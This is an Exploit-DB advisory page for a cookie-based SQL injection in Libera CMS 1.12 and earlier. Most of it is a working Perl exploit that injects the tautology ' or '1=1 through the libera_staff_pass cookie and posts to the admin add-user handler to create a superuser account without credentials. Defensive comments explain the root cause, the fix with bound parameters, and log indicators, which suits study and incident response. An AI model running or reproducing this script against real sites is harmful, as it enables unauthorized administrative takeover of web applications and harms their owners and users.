Libera CMS <= 1.12 Cookie Remote SQL Injection Exploit

2008-09-10T00:00:00
ID EDB-ID:6416
Type exploitdb
Reporter StAkeR
Modified 2008-09-10T00:00:00

Description

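Libera CMS <= 1.12 (Cookie) remote SQL injection exploit (CVE-2008-4700, CVE-2008-4701); a webapps exploit for the PHP platform. The proof-of-concept below sends a SQL tautology in the `libera_staff_pass` cookie instead of logging in, then posts to the admin add-user action, so the demonstrated impact is creation of a new administrator account by a client that holds no valid credentials. The root-cause fix is on the server side: bind the cookie value as a query parameter rather than concatenating it into SQL, and treat any unexpected administrator account on an affected install as a sign of compromise.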

                                        
                                            #!/usr/bin/perl
 # ----------------------------------------------------------
 # Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit
 # Perl Exploit - Add a new admin with your credentials!
 # Author: StAkeR - StAkeR[at]hotmail[dot]it
 # ----------------------------------------------------------
 # Usage: perl http://localhost/cms StAkeR obscure
 # ----------------------------------------------------------

 use strict;
 use LWP::UserAgent;

 # Positional arguments: the target base URL, then the account name and
 # password that the request below asks the CMS to create.
 my ($hostname,$username,$password) = @ARGV;
 my $request  = undef;
 # NOTE(review): indirect-object constructor call; LWP::UserAgent->new is the
 # unambiguous form. The script enables strict but not warnings.
 my $http_s   = new LWP::UserAgent or die $!;

 # Argument checks: the first argument must start with "http://" and both
 # account fields must be true values; otherwise banner() prints the usage
 # text and exits.
 $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
 banner() unless $username and $password;

 # Fixed client fingerprint: a hard-coded User-Agent string and a one-second
 # timeout. The literal User-Agent is a cheap indicator to search for in web
 # logs, although it is trivially changed and so is weak evidence by itself.
 $http_s-&gt;agent("Mozilla/4.5 [en] (Win95; U)");
 $http_s-&gt;timeout(1);
 # Core of the issue: every request carries a libera_staff_pass cookie whose
 # value is a SQL tautology. Presumably the admin check concatenates this
 # cookie into a query unescaped -- the server code is not shown here, so
 # confirm against the CMS source. Defensive reading: a quote character in
 # this cookie is never legitimate and is worth alerting on; default
 # access-log formats usually omit cookies, so that needs a WAF rule or
 # extended request logging. The fix is a bound query parameter.
 $http_s-&gt;default_header('Cookie' =&gt; "libera_staff_pass=' or '1=1");           

 # One POST to the admin "add user" action with no prior login step; the
 # cookie above is the only credential sent. su => 1 looks like the
 # superuser flag -- TODO confirm against the CMS form handler.
 $request = $http_s-&gt;post($hostname."/admin.php?action=add_user_process",
                         [
                          username       =&gt; $username,
                          password       =&gt; $password,
                          password_again =&gt; $password,
                          email          =&gt; 0,
                          su             =&gt; 1,
                          submit         =&gt; "Add+User"
                        ]);
        
 # Result handling: only a successful HTTP response is inspected, and the
 # outcome is judged solely by the phrase "added successfully" in the body.
 # A failed request (timeout, non-2xx status) prints nothing at all.
 # Incident-response note: on an affected install the durable artefact of
 # this request is an unexpected superuser entry in the CMS user store.
 if($request-&gt;is_success)
 {
   if($request-&gt;content =~ /added successfully/i)
   {
     print "[+] Exploit Done!\n";
     print "[+] Added New Administrator:\n\n";
     print "[+] Username: ${username}\n";
     print "[+] Password: ${password}\n";
   }
   else
   {
     print "[!] Exploit Failed!\n";
     print "[!] Site Not Vulnerable\n";
   }
 }


 # Print the usage banner and terminate the script; takes no arguments.
 # NOTE(review): the banner text says "<= 1.2" while the file header and the
 # advisory title say "<= 1.12"; the string is left as published.
 # `return exit;` never returns a value: exit ends the process first.
 sub banner
 {
   print "[+] Libera CMS &lt;= 1.2 Remote SQL Injection Exploit (add new admin)\n";
   print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
   print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n";
   return exit;
 }

# milw0rm.com [2008-09-10]